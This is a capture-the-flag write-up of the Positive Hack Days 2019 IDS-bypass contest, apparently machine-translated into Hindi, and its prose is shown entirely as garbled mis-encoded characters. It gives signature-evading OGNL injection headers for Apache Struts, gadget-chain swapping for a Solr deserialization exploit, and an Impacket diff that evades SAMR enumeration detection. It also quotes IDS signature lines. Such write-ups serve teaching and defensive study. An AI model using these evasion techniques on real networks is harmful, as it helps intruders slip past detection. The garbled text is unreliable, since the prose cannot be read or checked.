рдкреЙрдЬрд┐рдЯрд┐рд╡ рд╣реИрдХ рдбреЗрдЬрд╝ 2019 рдЕрдВрддрд░рд░рд╛рд╖реНрдЯреНрд░реАрдп рдордВрдЪ рдиреЗ рдкрд╣рд▓реА рдЖрдИрдбреАрдПрд╕ рдмрд╛рдпрдкрд╛рд╕ рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рдХреА рдореЗрдЬрдмрд╛рдиреА рдХреАред рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдХреЛ рдкрд╛рдВрдЪ рдиреЛрдбреНрд╕ рдХреЗ рдПрдХ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗрдЧрдореЗрдВрдЯ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреА рдереА, рдлрд┐рд░ рдпрд╛ рддреЛ рд╕реЗрд╡рд╛ рдХреА рднреЗрджреНрдпрддрд╛ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдпрд╛, рдпрд╛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рд╢рд░реНрдд рдХреЛ рдкреВрд░рд╛ рдХрд┐рдпрд╛ (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ HTTP рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рднреЗрдЬреЗрдВ) рдФрд░ рдЗрд╕ рддрд░рд╣ рдЭрдВрдбрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред рдПрдХ рд╢реЛрд╖рдг рдЦреЛрдЬрдирд╛ рдЖрд╕рд╛рди рдерд╛, рд▓реЗрдХрд┐рди рдЖрдИрдбреАрдПрд╕ рдиреЗ рдХрд╛рд░реНрдп рдХреЛ рдЬрдЯрд┐рд▓ рдХрд░ рджрд┐рдпрд╛: рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдФрд░ рдиреЛрдбреНрд╕ рдХреЗ рдмреАрдЪ рдЦрдбрд╝рд╛ рдерд╛ рдФрд░ рдкреНрд░рддреНрдпреЗрдХ рдиреЗрдЯрд╡рд░реНрдХ рдкреИрдХреЗрдЯ рдХреА рдЬрд╛рдВрдЪ рдХреАред рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдиреЗ рдбреИрд╢рдмреЛрд░реНрдб рдкрд░ рджреЗрдЦрд╛ рдХрд┐ рдХреНрдпрд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдиреЗ рдЙрдирдХреЗ рдХрдиреЗрдХреНрд╢рди рдХреЛ рдЕрд╡рд░реБрджреНрдз рдХрд░ рджрд┐рдпрд╛ рд╣реИред рдиреАрдЪреЗ рдореИрдВ рдЖрдкрдХреЛ рд╕реНрд╡рдпрдВ рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдмрддрд╛рдКрдВрдЧрд╛ рдФрд░ рдЙрдирдХреЗ рд╕рдорд╛рдзрд╛рди рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реВрдВрдЧрд╛ред
100.64.0.11 - рд╕реНрдЯреНрд░рдЯреНрд╕
рдХрд╛рд░реНрдп рд╣рд▓ рдХрд░рдиреЗ рд╡рд╛рд▓реЛрдВ рдХреА рд╕рдВрдЦреНрдпрд╛ рдореЗрдВ рдкрд╣рд▓рд╛ рдиреЛрдб рд╕реНрдЯреНрд░рдЯреНрд╕ рдерд╛ред Nmap рдкреЛрд░реНрдЯ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рдЕрдкрд╛рдЪреЗ рд╕реНрдЯреНрд░рдЯреНрд╕ рд╕рд░реНрд╡рд┐рд╕ рдХреЛ рдкреЛрд░реНрдЯ 8080 рдкрд░ рдкрд╛рддреЗ рд╣реИрдВред

2017 рдореЗрдВ рдЕрдкрд╛рдЪреЗ рд╕реНрдЯреНрд░рдЯреНрд╕ рдХреЗ рд▓рд┐рдП рднреЗрджреНрдпрддрд╛ рдХреА рдореГрддреНрдпреБ рд╣реЛ рдЧрдИ: рдУрдЬреАрдПрдирдПрд▓ рдЗрдВрдЬреЗрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдХреЗ рдмрд┐рдирд╛ рд╕реНрдЯреНрд░рдЯреНрд╕ рдкрд░ рдХрд┐рд╕реА рднреА рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдПрдХ рд╢реЛрд╖рдг рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП,
GitHub рдкрд░, рд▓реЗрдХрд┐рди IDS рдкрдХрдбрд╝рд╛ рдЧрдпрд╛ рд╣реИ:
[Drop] [**] [1:1001:1] Apache Struts2 OGNL inj in header (CVE-2017-5638) [**]
рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреЛрдб рд╕реНрд╡рдпрдВ рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдЙрдкрд▓рдмреНрдз рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рд▓реЙрдЧ рдореЗрдВ рд╕рдВрджреЗрд╢ рд╕реЗ рдЖрдк рдЗрд╕рдХреЗ рд╕рдВрдЪрд╛рд▓рди рдХреЗ рддрдВрддреНрд░ рдХреЛ рд╕рдордЭ рд╕рдХрддреЗ рд╣реИрдВред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдиреЗ HTTP рдореЗрдВ рдПрдХ OGNL рдЗрдВрдЬреЗрдХреНрд╢рди рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдпрд╛:
GET /showcase.action HTTP/1.1 Accept-Encoding: identity Host: 100.64.0.11:8080 Content-Type: %{(
рдпрджрд┐ рд╣рдо рдЖрдИрдбреАрдПрд╕ рдХреЗ рд╡реНрдпрд╡рд╣рд╛рд░ рдХреА рдЬрд╛рдВрдЪ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЬрд╛рдПрдЧрд╛ рдХрд┐ рдпрд╣ рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░ рд╣реЗрдбрд░ рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдВ рд╕рдВрдпреЛрдЬрди% {рдХреЛ рдкрдХрдбрд╝рддрд╛ рд╣реИред рдХрдИ рд╕рдорд╛рдзрд╛рди рд╣реИрдВ:
- рдкреНрд░рддрд┐рднрд╛рдЧреА @empty_jack рдиреЗ рдлрд╝реБрдЬрд╝рд░рд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдЕрдкрдиреЗ рд╢рдмреНрджрдХреЛрд╢ рдХреЗ рд╕рд╛рде рд╡рд░реНрдг {{рдХреЗ рд╕рдВрдпреЛрдЬрди рдХреЛ рддреЛрдбрд╝рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХреА рдФрд░ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд▓рд╛рдЗрди-рдЯрд╛рдЗрдк:% $ {рдХреЗ рд╕рд╛рде рдПрдХ рд╕рдорд╛рдзрд╛рди рдЖрдпрд╛ред
- HTTP рд░рд┐рдХреНрд╡реЗрд╕реНрдЯ рдХреЛ Fuzz рдХрд░реЗрдВред рд╕рджрд╕реНрдп @ c00lhax0r рдиреЗ рдкрд╛рдпрд╛ рдХрд┐ рд╣реЗрдбрд░ рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдВ рдЕрд╢рдХреНрдд рдЪрд░рд┐рддреНрд░ рдЖрдИрдбреАрдПрд╕ рдХреЛ рднреА рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдЧрд╛: рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: \ 0 $ {ред
- CVE-2017-5638 рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХрд╛рдВрд╢ рдХрд╛рд░рдирд╛рдореЗ рдПрдХ рдкреНрд░рддрд┐рд╢рдд рдкреНрд░рддреАрдХ рдХреЗ рд╕рд╛рде рдПрдХ рдЗрдВрдЬреЗрдХреНрд╢рди рдХрд░рддреЗ рд╣реИрдВред рд▓реЗрдХрд┐рди рдЗрд╕ рдФрд░ рдкрд┐рдЫрд▓реЗ Apache Struts рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рдХреБрдЫ рд╢реЛрдзрдХрд░реНрддрд╛ рд▓рд┐рдЦрддреЗ рд╣реИрдВ рдХрд┐ рдЗрдВрдЬреЗрдХреНрд╢рди% рдФрд░ $ рджреЛрдиреЛрдВ рдХреЗ рд╕рд╛рде рд╢реБрд░реВ рд╣реЛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕ рдкреНрд░рдХрд╛рд░, $ {рдХрд╛ рд╕рдВрдпреЛрдЬрди рдЖрдИрдбреАрдПрд╕ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдЧрд╛ рдФрд░ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдЧрд╛ред рдЗрд╕ рддрд░рд╣ рдХреЗ рдирд┐рд░реНрдгрдп рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдВ рдХрд▓реНрдкрдирд╛ рдХреА рдЧрдИ рдереАред
рдпрд╣ рдХрд╛рд░реНрдп рд╕рдмрд╕реЗ рдЖрд╕рд╛рди рдерд╛, рдпрд╣ рдЖрда рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рджреНрд╡рд╛рд░рд╛ рддрдп рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред
100.64.0.10 - рд╕реЛрд▓рд░
рдкреЛрд░реНрдЯ 8983 рдореЗрдВ рдЬрд╛рд╡рд╛ рдореЗрдВ рд▓рд┐рдЦрд╛ рдЕрдкрд╛рдЪреЗ рд╕реЛрд▓рд░ рд╕рд░реНрд╡рд░ рдерд╛ред
$ nmap -Pn -sV -p1-10000 100.64.0.10 22/tcp open ssh (protocol 2.0) 8983/tcp open http Jetty

Apache Solr 5.3.0 рдХреЗ рд▓рд┐рдП рдПрдХ рд╢реЛрд╖рдг рдЖрд╕рд╛рди рд╣реИ -
CVE-2019-0192 ред рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдПрдХ рд╕рдВрдЧреНрд░рд╣ рдореЗрдВ рдПрдХ RMI рд╕рд░реНрд╡рд░ рдХрд╛ рдкрддрд╛ рдЦрд░рд╛рдм рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдСрдкрд░реЗрд╢рди рдХреЗ рд▓рд┐рдП ysoserial рдлреНрд░реЗрдорд╡рд░реНрдХ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рдЬреЛ рдЬрд╛рд╡рд╛ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ (рдЧреИрдЬреЗрдЯреНрд╕) рдХреА рдЪреЗрди рдЬреЗрдирд░реЗрдЯ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЙрдиреНрд╣реЗрдВ рд╡рд┐рднрд┐рдиреНрди рддрд░реАрдХреЛрдВ рд╕реЗ рдбрд┐рд▓реАрд╡рд░ рдХрд░рддрд╛ рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, JRMP рд╕рд░реНрд╡рд░ рд╕реЗред
рдмреЗрд╢рдХ, рдорд╛рдереЗ рдореЗрдВ рдорд╛рдереЗ рдХреЗ рд╢реЛрд╖рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП, рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдХреЛ рдЖрдИрдбреАрдПрд╕ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдЯреНрд░рд┐рдЧрд░ рд╣реЛрддреЗ рджрд┐рдЦрд╛рдИ рджреЗрдВрдЧреЗ:
[Drop] [**] [1:10002700:3001] ATTACK [PTsecurity] Java Object Deserialization RCE POP Chain (ysoserial Jdk7u21) [**]
Jdk7u21 рдХреЗрд╡рд▓ рддреАрд╕ рднрд╛рд░реЛрдВ рдореЗрдВ рд╕реЗ рдПрдХ рд╣реИ, рдФрд░ рдЙрдирдХреА рдкрд╕рдВрдж рдХрдордЬреЛрд░ рд╕реЗрд╡рд╛ рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рдкреБрд╕реНрддрдХрд╛рд▓рдпреЛрдВ рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддреА рд╣реИред Jdk7u21 рдЧреИрдЬреЗрдЯ рд╢реНрд░реГрдВрдЦрд▓рд╛ рдЬрд╛рд╡рд╛ рдбреЗрд╡рд▓рдкрдореЗрдВрдЯ рдХрд┐рдЯ рд╕рдВрд╕реНрдХрд░рдг 7u21 рд╕реЗ рдХреЗрд╡рд▓ рдорд╛рдирдХ рдХрдХреНрд╖рд╛рдУрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреА рд╣реИ, рдФрд░ CommonsCollections1 рд╢реНрд░реГрдВрдЦрд▓рд╛ рдореЗрдВ рд╡реНрдпрд╛рдкрдХ рд░реВрдк рд╕реЗ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЧрдП рдЕрдкрд╛рдЪреЗ рдХреЙрдорди рдХрд▓реЗрдХреНрд╢рдВрд╕ 3.1 рд╕реЗ рдХрдХреНрд╖рд╛рдПрдВ рд╢рд╛рдорд┐рд▓ рд╣реИрдВред
рд╣рдорд▓рд╛рд╡рд░ рд╕реЛрд▓рд░ рд╕рдВрдЧреНрд░рд╣ рдореЗрдВ рдЖрд░рдПрдордЖрдИ рд╕рд░реНрд╡рд░ рдХреЗ рдкрддреЗ рдХреЛ рдЕрдкрдиреЗ рд╕реНрд╡рдпрдВ рдХреЗ рд╕рд╛рде рдмрджрд▓ рджреЗрддрд╛ рд╣реИ, рдФрд░ рдлрд┐рд░ рдЬреЗрдЖрд░рдПрдордкреА рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░рддрд╛ рд╣реИред рд╕реЛрд▓рд░ рдПрдХ рдкрддреЗ рдкрд░ рдПрдХ рд╡рд╕реНрддреБ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рддрд╛ рд╣реИ рдФрд░ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдЬрд╛рд╡рд╛ рдСрдмреНрдЬреЗрдХреНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдбреАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝реЗрд╢рди рдХреЗ рдмрд╛рдж, рдХреЛрдб рдХреЛ рд╕рд░реНрд╡рд░ рдкрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреНрд░рдордмрджреНрдз рдЬрд╛рд╡рд╛ рдСрдмреНрдЬреЗрдХреНрдЯ рдореЗрдВ рдХрдХреНрд╖рд╛рдУрдВ рдХреЗ рдЕрдиреБрдХреНрд░рдо рдкрд░ рдЖрдЧ рд▓рдЧрд╛рддреЗ рд╣реИрдВред рдпрд╣ рд╣рдорд▓рд╛рд╡рд░ рдХреА рдорд╢реАрди рд╕реЗ рдкреНрд░реЗрд╖рд┐рдд рд╣реЛрддрд╛ рд╣реИ рдФрд░ рдЯреНрд░реИрдлрд╝рд┐рдХ рдЗрд╕ рддрд░рд╣ рд╕реЗ рд╢реБрд░реВ рд╣реЛрддрд╛ рд╣реИ:

рдЗрд╕ рд╕рдорд╕реНрдпрд╛ рдХрд╛ рд╣рд▓ рд╕рд░рд▓ рдерд╛ред рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ Jdk7u21 рдХреЛ рд╕рдВрджрд░реНрднрд┐рдд рдХрд░рддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдЪрд╛рд░реЛрдВ рдУрд░ рдЬрд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ рдЧреИрдЬреЗрдЯреНрд╕ рдХреА рдЕрдиреНрдп рд╢реНрд░реГрдВрдЦрд▓рд╛рдУрдВ рдХреЛ рдЖрдЬрд╝рдорд╛рдирд╛ рд╣реЛрдЧрд╛ред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, CommonsCollections рдореЗрдВ рд╕реЗ рдПрдХред рдЖрдИрдбреАрдПрд╕ рдореЗрдВ рдЕрдиреНрдп рд╢реНрд░реГрдВрдЦрд▓рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдирд╣реАрдВ рдереЗред рдкреНрд░рддрд┐рднрд╛рдЧреА рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдЧрд╛ рдФрд░ рдзреНрд╡рдЬ рдХреЛ рдкрдврд╝реЗрдЧрд╛ред рдкрд╛рдВрдЪ рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдиреЗ рдЯрд╛рд╕реНрдХ рдкреВрд░рд╛ рдХрд┐рдпрд╛ред
100.64.0.12 - рдПрд╕рдПрдПрдордЖрд░
рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рдХреЗ рд╕рдмрд╕реЗ рдХрдард┐рди рдФрд░ рджрд┐рд▓рдЪрд╕реНрдк рдХрд╛рд░реНрдпреЛрдВ рдореЗрдВ рд╕реЗ рдПрдХред рдпрд╣ рдПрдХ рд╡рд┐рдВрдбреЛрдЬ рдорд╢реАрди рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдПрдХ рдЦреБрд▓рд╛ 445 рд╡рд╛рдВ рдкреЛрд░реНрдЯ рд╣реИред рдЭрдВрдбреЗ рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рджреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдирд╛рдо рдореЗрдВ рд╡рд┐рднрд╛рдЬрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдХрд╛рд░реНрдп рдХреЛ рдкреВрд░рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рдВрдбреЛрдЬ рдиреЛрдб рдкрд░ рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рдерд╛ред
рдмреЗрд╢рдХ, MS17-010 рдФрд░ рдЕрдиреНрдп рдХрд╛рд░рдирд╛рдореЛрдВ рдиреЗ рдЗрд╕ рдорд╢реАрди рдкрд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд┐рдпрд╛ред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ
рдПрдирдореИрдк рдпрд╛
рдЗрдВрдкреЗрдХреЗрдЯ рдлреНрд░реЗрдорд╡рд░реНрдХ рд╕реЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреА рдЧрдгрдирд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
$ python samrdump.py 100.64.0.12 Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies [*] Retrieving endpoint list from 100.64.0.12 [*] Trying protocol 445/SMBтАж Found domain(s): . SAMR . Builtin [*] Looking up users in domain SAMR [-] The NETBIOS connection with the remote host timed out. [*] No entries received.
рджреЛрдиреЛрдВ рдкрд░рд┐рджреГрд╢реНрдп рдкреЛрд░реНрдЯ 445 рдкрд░ рдорд╢реАрди рд╕реЗ DCERPC рдЕрдиреБрд░реЛрдз рдХрд░рддреЗ рд╣реИрдВред рд▓реЗрдХрд┐рди рд╕рдм рдХреБрдЫ рдЗрддрдирд╛ рд╕рд░рд▓ рдирд╣реАрдВ рд╣реИ: рдХреБрдЫ рдкреИрдХреЗрдЯ рдЖрдИрдбреАрдПрд╕ рджреНрд╡рд╛рд░рд╛ рдЕрд╡рд░реБрджреНрдз рд╣реЛрддреЗ рд╣реИрдВ, рдФрд░ рдЗрд╕ рд╕рдордп рджреЛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдЯреНрд░рд┐рдЧрд░ рд╣реЛрддреЗ рд╣реИрдВ:
[**] [1:2001:2] SAMR DCERPC Bind [**]
[Drop] [**] [1:2002:2] SAMR EnumDomainUsers Request [**]
рдкрд╣рд▓реЗ рдПрдХ рдПрд╕рдПрдПрдордЖрд░ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдПрдХ рдХрдиреЗрдХреНрд╢рди рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рддрд╛ рд╣реИ рдФрд░ рдХреЗрд╡рд▓ рдПрдХ рдзреНрд╡рдЬ рдХреЗ рд╕рд╛рде рдЯреАрд╕реАрдкреА рдХрдиреЗрдХреНрд╢рди рдХреЛ рдЪрд┐рд╣реНрдирд┐рдд рдХрд░рддрд╛ рд╣реИред рдФрд░ рджреВрд╕рд░рд╛ SAMR рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП EnumDomainUsers рдЕрдиреБрд░реЛрдз рджреНрд╡рд╛рд░рд╛ рдЯреНрд░рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдЗрд╕ рд╕реЗрд╡рд╛ рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рдЕрдиреНрдп рддрд░реАрдХреЗ рд╣реИрдВ: QueryDisplayInfo, QueryDisplayInfo2, QueryDisplayInfo3ред рдЙрди рд╕рднреА рдХреЛ рднреА рд╣рд╕реНрддрд╛рдХреНрд╖рд░реЛрдВ рджреНрд╡рд╛рд░рд╛ рдЕрд╡рд░реБрджреНрдз рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред
DCERPC рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдФрд░ рд╡рд┐рдВрдбреЛрдЬ рд╕реЗрд╡рд╛рдПрдВ рджреВрд░рд╕реНрде рд╕рд╛рдЗрдЯ рдкреНрд░рдмрдВрдзрди рдХреЗ рд▓рд┐рдП рдЬрдмрд░рджрд╕реНрдд рдЕрд╡рд╕рд░ рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИрдВред рдЗрд╕ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рд╕рдмрд╕реЗ рдкреНрд░рд╕рд┐рджреНрдз рдЙрдкрдХрд░рдг рдЬреИрд╕реЗ PsExec рдпрд╛ BloodHound рджреНрд╡рд╛рд░рд╛ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдПрд╕рдПрдПрдордЖрд░ рд╕реЗрд╡рд╛, рдпрд╛рдиреА рдПрд╕рдПрдПрдо рд░рд┐рдореЛрдЯ рдкреНрд░реЛрдЯреЛрдХреЙрд▓, рдЖрдкрдХреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рд╕реВрдЪреА рд╕рд╣рд┐рдд рдореЗрдЬрдмрд╛рди рдкрд░ рдЦрд╛рддреЛрдВ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред
EnumDomainUser Impacket рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрди рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИ:

SAMR рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдПрдХ DCERPC рдХрдиреЗрдХреНрд╢рди SMB рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдЖрдЧреЗ рдХреЗ рд╕рднреА рдЕрдиреБрд░реЛрдз рдЗрд╕ рд╕реЗрд╡рд╛ рдХреЗ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рддреЗ рд╣реИрдВред рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд╕реЗ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдкрд╣рд▓реЗ рдФрд░ рдЖрдЦрд┐рд░реА рдкреИрдХреЗрдЯ рдкрд░ рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВред
рдореИрдВрдиреЗ рдЕрд╕рд╛рдЗрдирдореЗрдВрдЯ рдХреЗ рджреЛ рд╕реБрд░рд╛рдЧ рджрд┐рдП:
- рдЖрдкрдХреЗ рдкреНрд░рдпрд╛рд╕реЛрдВ рдХреЗ рдХрд╛рд░рдг IDS 2 рдЕрд▓рд░реНрдЯ рдЙрддреНрдкрдиреНрди рдХрд░рддреЗ рд╣реИрдВред рдкрд╣рд▓реЗ рджреЗрдЦреЛред
- рдЗрд╕ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рд▓рд┐рдП рдХреМрди рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдХреА рдЖрдЬреНрдЮрд╛ рд╣реИ?
рдпрд╣ DCERPC рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдФрд░ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╣реИред рдЙрдкрд▓рдмреНрдз PDUs рдХреА рд╕реВрдЪреА рдореЗрдВ, Bind рдФрд░ Alter Context рдХрдорд╛рдВрдб рд╕рдВрджрд░реНрдн рдХреЛ рдЬреЛрдбрд╝рдиреЗ рдФрд░ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд┐рдореНрдореЗрджрд╛рд░ рд╣реИрдВ, рдФрд░ рджреВрд╕рд░рд╛ рдХрдиреЗрдХреНрд╢рди рдХреЛ рддреЛрдбрд╝рдиреЗ рдХреЗ рдмрд┐рдирд╛ рд╡рд░реНрддрдорд╛рди рд╕рдВрджрд░реНрдн рдХреЛ рдмрджрд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред
рдЗрд╕реЗ рд╣рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕рдордбреНрд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рддрд░реНрдХ рдХреЛ рдлрд┐рд░ рд╕реЗ рд▓рд┐рдЦрдирд╛ рдЖрд╡рд╢реНрдпрдХ рдерд╛:
- рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 рдХреЗ рд╕рд╛рде рдПрдХ рдЕрдиреНрдп рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдмрд╛рдЗрдВрдб рдХрд░реЗрдВред
- SAMR рдкрд░ рд╕реНрд╡рд┐рдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП Alter Context рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред
- EnumDomainUsers рдореЗрдВ рдЕрдиреБрд░реЛрдз рднреЗрдЬреЗрдВред
рдкрд░рд┐рд╡рд░реНрддрди рддреАрди рд▓рд╛рдЗрдиреЛрдВ рдкрд░ рдлрд┐рдЯ рд╣реЛрддреЗ рд╣реИрдВ:
< dce.bind(samr.MSRPC_UUID_SAMR) --- > dce.bind(uuid.uuidtup_to_bin(("3919286a-b10c-11d0-9ba8-00c04fd92ef5", "0.0"))) > dce.alter_ctx(samr.MSRPC_UUID_SAMR) > dce._ctx = 1
